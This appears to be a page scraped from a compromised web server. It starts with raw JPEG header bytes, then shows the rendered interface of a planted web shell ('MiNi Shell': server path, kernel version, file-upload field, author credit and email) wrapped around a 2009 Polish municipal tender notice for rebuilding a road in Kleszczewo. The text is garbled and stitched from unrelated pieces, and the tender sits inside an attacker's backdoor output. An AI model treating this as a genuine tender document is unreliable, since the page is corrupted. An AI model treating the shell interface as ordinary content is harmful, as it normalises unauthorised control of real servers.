JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090710/233734-N-2009.html

<p class="kh_header"><b>Kleszczewo: Przetarg nieograniczony na roboty budowlane 
dla zadania pn.
Przebudowa  drogi gminnej nr 329016P  
Zimin - Nowy Świat</b><br>
<b>Numer ogłoszenia: 233734 - 2009; data zamieszczenia: 10.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kleszczewo - Urząd Gminy Kleszczewo , ul. Poznańska 4, 63-005 Kleszczewo, woj. wielkopolskie, tel. 061 8176017, 8176020, 8176033, faks 061 8176184.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kleszczewo.pl   i   www. bip.kleszczewo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na roboty budowlane 
dla zadania pn.
Przebudowa  drogi gminnej nr 329016P  
Zimin - Nowy Świat.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie o udzielenie zamówienia publicznego  o wartości poniżej progów unijnych prowadzonego w trybie przetargu  nieograniczonego  na roboty   budowlane,
Podstawa prawna udzielenia zamówienia publicznego: art. 10 ust. 1 oraz art. 39-46 Ustawy Prawo Zamówień Publicznych. 
Podstawa prawna opracowania specyfikacji istotnych warunków zamówienia:
1)  Ustawa z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity z 2006 r.  Dz. U. Nr 164  poz. 1163 ) 
2)  Rozporządzenie Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane  (Dz. U. Nr 87, poz. 605),
3)  Rozporządzenie Prezesa Rady Ministrów z dnia  9 grudnia 2007 r. w sprawie średniego kursu złotego w stosunku do euro stanowiącego podstawę przeliczania wartości zamówień publicznych,
4)  Rozporządzenie Prezesa Rady Ministrów z dnia 19.grudnia 2007r. w sprawie kwot wartości zamówień oraz konkursów od których jest uzależniony obowiązek przekazywania ogłoszeń Urzędowi Oficjalnych Publikacji Wspólnot Europejskich Dz. U.Nr 241, poz. 1762)
Opis przedmiotu zamówienia:
Przedmiot zamówienia 
Przedmiotem zamówienia jest  przebudowa istniejącej   nawierzchni/ szlakowej/ drogi gminnej, długości przebudowanych odcinków  970,00mb, 310,00mb, 68,58mb  zlokalizowanej w miejscowości Zimin - Zimin Nowy Świat  w gminie Kleszczewo.
Oznaczenie wg. Wspólnego Słownika Zamówień CPV;
CPV : 45 23 31 20 - 6  Prace budowlane dotyczące budowy dróg,
             45  23  32 10 - 4     Prace dotyczące kładzenia nawierzchni dróg 

Wykonawca Przygotowuje pełną dokumentację odbiorową.
Wykonanie prac odbiorowych (inwentaryzacja geodezyjna 4 egz., dokumentacja powykonawcza 2 egz. I pomiarowe 2 egz. protokół odbioru   technicznego zgłoszenia instytucjom określonym prawem budowlanym i pozwoleniem na budowę , inne dokumenty umożliwiające  oddanie obiektu w użytkowanie. Po stronie Wykonawcy leży powołanie kierownika budowy wykonującego swoje obowiązki zgodnie z Ustawą Prawa Budowlanego.
W ramach zadania należy w miejscu prowadzenia robót wykonać roboty porządkowe, wyrównanie terenu oraz wszelkie  prace mające na celu doprowadzenie do stanu pierwotnego ( również odtworzenie nawierzchni w  miejscach  włączenia w pozostałe odcinki jezdni nie będące przedmiotem zamówienia, oraz uszkodzenia drogi które wystąpiły przy realizacji zadania. 
W cenie mieści się całkowity koszt kompletnego wykonania zadania inwestycyjnego, stanowiącego przedmiot zamówienia w tym również wszelkie inne koszty towarzyszące jak np. zaplecze budowy, obsługa geodezyjna , inwentaryzacja powykonawcza wykonana przez uprawnionego geodetę , projekt oznakowania robot, zajęcie pasa drogowego, koszty wywiezienia i składowania urobisk, odszkodowania itp. 
Zakończenie realizacji zadania uznaje się w momencie przekazanie obiektu w użytkowanie.
Do obliczenia ceny ofertowej brutto Wykonawca przyjmuje stawkę podatku VAT 22% 
  Szczegółowy opis zadania: 
1. Zakres rzeczowy:
Początek robót drogowych - krawędź  istniejącej nawierzchni bitumicznej drogi    powiatowej  nr 2447 P  , Krerowo - Śródka,   o szerokości nawierzchni 4,50 m i przekroju daszkowym oraz pobocza szerokości 0,75 m. Krawędzie jezdni zabezpiecza się  przed obłamywaniem i odkształcaniem przez zastosowanie odsadzek poszczególnych warstw konstrukcyjnych.
Odwodnienie jezdni, tak jak dotychczas, ogranicza się do spływu wód opadowych na przyległy obszar w granicach pasa drogowego. Zjazdy utwardzono na szerokości pobocza gruntowego. 
2. Podstawowy zakres inwestycji
Zadanie  nazwą Przebudowa drogi gminnej nr 329016P Zimin - Nowy Świat obejmuje swoim zakresem następujące prace:
- przebudowę jezdni o nawierzchni bitumicznej drogi gminnej 329016P
- przebudowę jezdni o nawierzchni bitumicznej dróg osiedlowych na terenach zabudowy  mieszkaniowej o  
  długościach: Zjazd A - 309,09 m, Zjazd B - 68,58 m,
- przebudowę zjazdów
- przebudowę poboczy gruntowych po obu stronach jezdni z mieszanki gliniasto - żwirowej,
- przebudowę skrzyżowania z drogą powiatową nr 32247 Śródka - Krerowo
3.  Podstawowe parametry techniczne
Przebudowa nawierzchni drogi gminnej we wsi Zimin została zaprojektowana z
wykorzystaniem następujących parametrów technicznych:
- kategoria administracyjna: droga gminna,
- klasa techniczna: D - dojazdowa,
- prędkość projektowa: 30 km/h,
- przekrój poprzeczny: 1x2,
- szerokość pasa ruchu: 2,25 m,
- szerokość pobocza gruntowego : 0,75 m,
- dopuszczalne obciążenie na oś: 80 kN,
	Jezdnia na istniejącej nawierzchni
  warstwa ścieralna z mieszanki mineralno asfaltowej grysowej zamkniętej gr. 5 cm.
  wzmocnienie konstrukcji jezdni z kruszywa kamiennego łamanego stabilizowanego    
  mechanicznie średniej gr. 10 cm.
  istniejąca nawierzchnia żużlowa gr. 20 cm. pełniąca rolę warstwy podbudowy
  zjazdy
  warstwa ścieralna z mieszanki mineralno asfaltowej grysowej zamkniętej gr. 5 cm.
  podbudowa z kruszywa kamiennego łamanego stabilizowanego mechanicznie gr. 10 cm..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.32.10-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany wnieść wadium w wysokości 10 000,00 PLN (słownie: dziesięć tysięcy   00/100 zł .
Wadium można wnieść zgodnie z art.45 ust.6 ustawy prawo zamówień publicznych w jednej z niżej wymienionych form:
-	w gotówce
-	w poręczeniach bankowych
-	gwarancjach bankowych
-	gwarancjach ubezpieczeniowych
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt. 4 lit. B ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 oraz z 2002r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki udziału w postępowaniu.
 Ogólne warunki udziału w postępowaniu
 O udzielenie zamówienie mogą ubiegać się oferenci, którzy spełnią  warunki określone w art. 22 ust. 1    ustawy Prawo zamówień publicznych, tj.: 
posiadają  odpowiednie zgody na prowadzenie   działalności lub czynności, związanych z realizacją przedmiotu zamówienia,
posiadają niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;
znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.  24 ust. 1,2  Ustawy  Prawo Zamówień.
1.2. Warunki szczegółowe wymagane od wykonawców;
1)	Wykonawca musi posiadać środki finansowe lub możliwości zaciągnięcia kredytu w wysokości  umożliwiającej  realizację  umowy . Udokumentowanie zaświadczeniem z banku o zasobach   finansowych lub możliwości zaciągnięcia kredytu .  
  2)    Wykonawca musi posiadać kadrę techniczną w tym osobę wyznaczoną do kierowania robotami i    posiadającego        uprawnienia do pełnienia samodzielnych funkcji w budownictwie w zakresie zleconego zadania, należącą do właściwej    izby inżynierów budownictwa,  oraz pracowników fizycznych o   kwalifikacjach   umożliwiających wykonanie        przedmiotu     zamówienia.     Udokumentowanie należy przedstawić w formie list zawierającej : imię nazwisko , wykształcenie ,  uprawnienia       budowlane oraz staż pracy dla kadry oraz ilość pracowników w danym zawodzie robotniczym; 
2)	Wykonawca musi dysponować odpowiednimi  niezbędnym sprzętem (wraz z obsługą) przeznaczonymi 
          wyłącznie do realizacji niniejszego przedmiotu zamówienia.  Udokumentowanie należy przedstawić w 
          formie list zawierającej : rodzaj sprzętu , ilość , rok produkcji .
    4 ) Wykonawca w pięciu ostatnich latach zrealizował lub aktualnie realizuje minimum trzy zadania,  przez co najmniej 8            miesięcy   łącznie z należytą starannością usługę o charakterze i złożoności zbliżonej do przedmiotu zamówienia           objętego niniejszym postępowaniem (o wartości min 80 % ceny ofertowej brutto) Udokumentuje  odpowiednimi         referencjami    potwierdzającymi ich realizację 
  Wykonawca posiada: polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest    ubezpieczony od      odpowiedzialności cywilnej w zakresie prowadzonej działalności, związanej z   przedmiotem zamówienia,         
  Informacja w zakresie wykonania zamówienia przez podwykonawców - zamawiający nie przewiduje   możliwości 
         wykonywania usług przez podwykonawców, z wyjątkiem zdarzeń losowych, wówczas    całkowitą odpowiedzialność za        realizację zamówienia ponosić będzie Wykonawca.
7)       Wykonawca na przedmiot zamówienia udzieli gwarancji na roboty budowlane  na okres 36 miesięcy od     daty   odbioru         końcowego a na dostarczane urządzenia zgodnie z gwarancją producenta Wykonawca  zobowiązany będzie starczyć   na materiały wyposażenie użyte do  realizacji   przedmiotu zamówienia, zgodnych z projektem    świadectwa i atesty            dopuszczające do użytkowania     ( oświadczenie  )  
8)        W przypadku ewentualnych zamówień uzupełniających   dokonywanych przez  zamawiającego w ciągu     
          sześciu m-cy.  po odbiorze przedmiotu zamówienia  Oferent zrealizuje je w  cenach jednostkowych  tożsamych  z           przedstawioną ofertą  ( dla robót uzupełniających )  ,  stanowiących   nie więcej niż 50% zamówienia podstawowego i             dodatkowych po cenach   jednostkowych obowiązujących       w dniu złożenia oferty obliczonych na podstawie          obowiązujących  katalogów KRN.(oświadczeni)
9)       Wykonawca zobowiązany jest do wykonania dokumentacji powykonawczej wraz z inwentaryzacją  geodezyjną           wykonaną przez uprawnionego geodetę. 

2. Ocena spełnienia warunków 

2.1.	Z ubiegania się o udzielenie zamówienia publicznego wyklucza się:

1)	wykonawców, którzy nie spełniają warunków udziału w postępowaniu  o zamówienie publiczne, o
których mowa w art. 22 ust 1 oraz wykluczonych na podstawie   art. 24 ust. 1,2 Prawa zamówień publicznych,
2)	wykonawców,     którzy   bezpośrednio  wykonywali    czynności    związane    z    przygotowaniem     prowadzonego postępowania,   lub   posługiwali   się   w   celu   sporządzenia   oferty   osobami   uczestniczącymi   w dokonywaniu tych czynności, chyba, że udział  tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji,
3)	wykonawców,   którzy   złożyli   nieprawdziwe   informacje   mające   wpływ   na   wynik   prowadzonego
postępowania,
4)	wykonawców, którzy nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub
dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy , z zastrzeżeniem art. 92 ust. 1 pkt. 3,
5)	wykonawców, którzy nie zgodzili się na przedłużenie okresu związania ofertą.

3.1.  Zamawiający odrzuca ofertę, jeżeli:

1)	jest  niezgodna   z   ustawą ,
2)	jej  treść   nie   odpowiada   treści   specyfikacji   istotnych   warunków  zamówienia,
3)	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji,
4)	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
5)	została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia,
6)	zawiera, błędy w obliczeniu ceny,
7)	oferta wzywanego wykonawcy, która  w terminie 7 dni od dnia otrzymania zawiadomienia nie zostały poprawione   omyłki, o które mowa w art.87 ust.2.pkt 3
8)	jest nieważna na podstawie odrębnych przepisów.
9)	 oferty wykonawców, którzy wzywani do uzupełnienia w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy prawa zamówień publicznych , lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1 ustawy, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu, na roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania wniosków o dopuszczenie do udziału w postępowaniu albo termin składania ofert.
10)	Wykonawców którzy  wzywani przez zamawiającego , w wyznaczonym przez niego terminie nie  złożyli wyjaśnień dotyczących oświadczeń lub dokumentów, o których mowa w art. 25 ust 1. 
Oferta wspólna
 W przypadku, kiedy ofertę składa kilka podmiotów, oferta musi spełniać następujące warunki:
1.	   Wraz z ofertą winna  być przedłożona  kopia  umowy lub inny dokument potwierdzający
 zobowiązanie do zawarcia (przed udzieleniem zamówienia przez Zamawiającego) umowy konsorcjum,       spółki          cywilnej, podpisane przez wszystkich partnerów, przy czym termin, na jaki zostanie zawarta  umowa   konsorcjum,          nie może być krótszy niż termin realizacji zamówienia i obowiązywania rękojmi i gwarancji.
       2. Oferta winna być podpisana przez każdego partnera lub upoważnionego przedstawiciela 
          partnera wiodącego,
       3.Upoważnienie do pełnienia funkcji przedstawiciela, partnera wiodącego wymaga podpisu
           prawnie upoważnionych przedstawicieli każdego z partnerów - należy załączyć je do oferty,
       4.Przedstawiciel wiodący, partner winien  być  upoważniony do zaciągania  zobowiązań  i
           płatności   w   imieniu   każdego   na   rzecz   każdego   z   partnerów   oraz   do   wyłącznego
           występowania w realizacji kontraktu - do oferty należy załączyć oświadczenie,
        5.Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub
           nienależyte wykonanie zobowiązań.

Wykonawca jest zobowiązany wnieść zabezpieczenie należytego wykonania umowy w wysokości 2% wartości ofertowej brutto w formie zgodnej z art. 148 ust. 1 ustawy prawo zamówień publicznych.
W przypadku należytego wykonania przedmiotu umowy, 70% zabezpieczenia odebranego wykonania zostanie zwrócone lub uwolnione w ciągu 30 dni po odbiorze robót objętych i potwierdzonych protokołem odbioru, a pozostała część, tj. 30%, zostanie zwrócona lub zwolniona nie później niż w 15 dni po upływie okresu rękojmi za wady lub gwarancji jakości..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty wymagane:

W celu spełnienia warunków określonych art. 22. ust. 1 ustawy z dnia 29.stycznia 2004r.,   potwierdzających , że wykonawca 
posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie
art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, wykonawca składa oświadczenie. 

W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę oraz doświadczenie, potencjał techniczny, 
a   także dysponuje osobami zdolnymi do wykonania zamówienia, wykonawca składa następujące dokumenty:

1. Wypełniony i podpisany formularz ofertowy .

2. KOSZTORYS   OFERTOWE   dla zadania   ( przygotowany w oparciu o przedmiar robót.).

3. W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej 
wykonanie zamówienia wykonawca załączy  informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym  wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków           finansowych lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż   3 miesiące przed upływem terminu składania ofert, złożone jako załącznik do formularza ofertowego 
4.Podpisane ogólne warunki umowy,  jako akceptacja warunków w niej zawartych.

5.Aktualny wypis/odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, potwierdzające dopuszczenie do obrotu prawnego w zakresie objętym przedmiotem zamówienia oraz zawierającego nazwisko osoby (osób) uprawnionych do reprezentowania firmy (wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert).

6.Informacje z Krajowego Rejestru Karnego, dotyczące prawomocnego skazania za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia publicznego (szczególnie: wyłudzenia zamówienia, utrudnienia lub udaremnienia przetargu, zmowy przetargowej, przekupstwa) lub za jakiekolwiek inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych w zakresie określonym w art. 24 ust. 4-9 ustawy, wystawione nie wcześniej niż 6 miesięcy przed * terminem składania ofert. Jeśli oferentem jest spółka prawa handlowego ww. informacje powinny dotyczyć członków zarządu firmy.      

7.Aktualne zaświadczenia z właściwego Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub KRUS potwierdzające, że oferent nie zalega z uiszczaniem podatków, opłat oraz składek na ubezpieczenie społeczne, lub że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności (zaświadczenia muszą zostać wydane nie wcześniej niż 3 miesiące przed terminem składania ofert. 

8.Wypełniony załącznik nr 5 - Doświadczenie Wykonawcy + dołączone listy  
referencyjne min. 3 szt. wykaz wykonanych w okresie ostatnich pięciu  lat zadań  (o wartości min. 80 % ceny ofertowej brutto), przed dniem wszczęcia  postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, dat i miejsca wykonania; należy załączyć dokumenty (referencje) potwierdzające, że roboty te zostały wykonane należycie.

9.   Polisę  lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej obejmującej roboty na które  Wykonawca deklaruje się wykonać.

10. Dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają   z przepisów prawa  

11. Wykaz zatrudnionych osób + uprawnienia .

12.Wykaz sprzętu będący w dyspozycji w okresie wykonywania  przedmiotowego zadania.

13. Podpisane oświadczenie Wykonawcy, że nie podlega wykluczeniu udziału w postępowaniu na udzielenie 
zamówienia publicznego na podstawie art. 24 ustawy prawo zamówień publicznych i spełnia warunki określone 
w art.22 ust.1 ustawy. 

14. Oświadczenie, że w przypadku ewentualnych zamówień uzupełniających, stanowiących nie więcej niż 50% zamówienia podstawowego, dokonywanych przez zamawiającego w ciągu sześciu m-cy. po odbiorze przedmiotu zamówienia Oferent zrealizuje je w   cenach jednostkowych      tożsamych   z  przedstawioną ofertą  ( dla robót uzupełniających) ,  i dodatkowych po cenach        jednostkowych obowiązujących  w dniu złożenia oferty obliczonych na podstawie   obowiązujących  katalogów KRN..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kleszczewo.pl   lub www.bip.kleszczewo.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Kleszczewie 
Ul. Poznańska 4
63-005 Kleszczewo
pok. nr 4.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2009 godzina 08:00, miejsce: Urząd Gminy w Kleszczewie 
Ul. Poznańska 4
63-005 Kleszczewo
sekretariat ( pok. nr 16 ).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com